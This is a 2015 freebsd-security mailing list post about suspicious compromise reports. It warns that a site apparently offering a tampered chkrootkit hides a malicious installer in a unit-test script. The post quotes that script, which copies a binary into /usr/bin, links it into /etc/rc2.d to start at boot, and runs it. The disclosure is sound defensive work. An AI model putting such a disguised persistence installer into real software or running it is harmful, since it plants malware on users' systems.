has my 10.1-RELEASE system been compromised
Philip Jocks
pjlists at netzkommune.com
Wed Feb 25 20:34:25 UTC 2015
> Am 25.02.2015 um 21:25 schrieb Joseph Mingrone <jrm at ftfl.ca>:
>
> Philip Jocks <pjlists at netzkommune.com> writes:
>> are those the only lines they sent you? Weirdly, we got a report like this today
>> as well with the first (out of 8) sample line showing the exact time stamp
>> (23/Feb/2015:14:53:37 +0100) and the exact query string
>> (/?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7) which makes it
>> a bit strange to be a coincidence. There is a webserver running in a jail on the
>> reported IP address, but I can't find any log lines on our side that could be
>> related.
>> We asked the email.it folks for details, but haven't heard back from them yet.
>>
>> Philip
>
> Interesting. Yes, they sent nearly the same line about 8 times with the timestamps a
> second or two apart. What other daemons are you running on that host?
> Something other than the webserver could be compromised.
>
> Please share if you hear anything from email.it.
>
> Joseph
it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org which was registered a few days ago and looks like a tampered version of chkrootkit. I hope, nobody installed it anywhere, it seems to execute rkcheck/tests/.unit/test.sh which contains
#!/bin/bash
cp tests/.unit/test /usr/bin/rrsyncn
chmod +x /usr/bin/rrsyncn
rm -fr /etc/rc2.d/S98rsyncn
ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
/usr/bin/rrsyncn
exit
That doesn't look like something you'd want on your box...
Cheers,
Philip
More information about the freebsd-security
mailing list